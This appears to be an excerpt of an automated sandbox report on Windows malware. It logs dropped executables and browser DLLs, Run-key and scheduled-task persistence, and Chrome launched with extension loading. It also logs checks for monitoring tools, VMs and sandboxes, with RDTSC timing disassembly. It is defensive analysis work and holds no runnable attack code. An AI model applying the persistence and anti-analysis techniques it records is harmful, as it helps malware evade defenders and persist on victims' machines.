Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	File created: C:\Users\user\AppData\Local\Temp\main\7z.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File created: C:\Users\user\AppData\Local\Temp\RHNKLLDCS2RT92VKR9MYB3VQ90O2X.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1]			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]			Jump to dropped file

Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 35f0a75b93.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 142c991362.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 54682ac64c.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Registry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Graph
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2e4e1b8516.exe	Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 142c991362.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 142c991362.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 35f0a75b93.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 35f0a75b93.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2e4e1b8516.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2e4e1b8516.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 54682ac64c.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 54682ac64c.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Graph
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Graph
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Registry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Graph
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Registry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Graph

Source: C:\Program Files\Windows Media Player\graph\graph.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\file.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_0-12381
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_1-9709

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000003.3009363267.0000000007330000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmp	Binary or memory string: PROCMON.EXE
Source: b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000003.3009363267.0000000007330000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmp	Binary or memory string: X64DBG.EXE
Source: b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000003.3009363267.0000000007330000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmp	Binary or memory string: WINDBG.EXE
Source: b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmp	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000003.3009363267.0000000007330000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmp	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8BF57E second address: 8BF582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8BF582 second address: 8BF586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8BF586 second address: 8BEE0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F0E6551CA3Ch 0x0000000f push dword ptr [ebp+122D0361h] 0x00000015 pushad 0x00000016 mov edx, 453CDEBDh 0x0000001b mov dword ptr [ebp+122D35C1h], esi 0x00000021 popad 0x00000022 call dword ptr [ebp+122D2034h] 0x00000028 pushad 0x00000029 jmp 00007F0E6551CA46h 0x0000002e mov dword ptr [ebp+122D2273h], edx 0x00000034 xor eax, eax 0x00000036 jmp 00007F0E6551CA43h 0x0000003b mov dword ptr [ebp+122D2273h], edx 0x00000041 mov edx, dword ptr [esp+28h] 0x00000045 jmp 00007F0E6551CA3Eh 0x0000004a mov dword ptr [ebp+122D2D98h], eax 0x00000050 jmp 00007F0E6551CA48h 0x00000055 mov esi, 0000003Ch 0x0000005a clc 0x0000005b cld 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 jmp 00007F0E6551CA46h 0x00000065 lodsw 0x00000067 jp 00007F0E6551CA3Ch 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 pushad 0x00000072 mov eax, 3F34A5C6h 0x00000077 mov dx, ECF7h 0x0000007b popad 0x0000007c mov ebx, dword ptr [esp+24h] 0x00000080 stc 0x00000081 nop 0x00000082 pushad 0x00000083 jmp 00007F0E6551CA44h 0x00000088 jns 00007F0E6551CA3Ch 0x0000008e popad 0x0000008f push eax 0x00000090 push eax 0x00000091 push eax 0x00000092 push edx 0x00000093 push ebx 0x00000094 pop ebx 0x00000095 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3ED60 second address: A3EDAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6088h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0E647B60A3h 0x0000000f jmp 00007F0E647B6086h 0x00000014 jmp 00007F0E647B6087h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EDAF second address: A3EDB4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EDB4 second address: A3EDC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EDC2 second address: A3EDC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EDC6 second address: A3EDCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3F2C2 second address: A3F2C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3F5B8 second address: A3F5BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3F5BE second address: A3F5CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3F5CA second address: A3F5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3F5CF second address: A3F5D4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4237B second address: A4237F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
